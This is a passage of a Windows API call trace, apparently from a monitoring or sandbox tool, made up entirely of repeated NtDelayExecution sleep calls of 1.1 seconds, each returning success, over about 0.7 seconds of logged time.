(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0139.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.186] NtDelayExecution 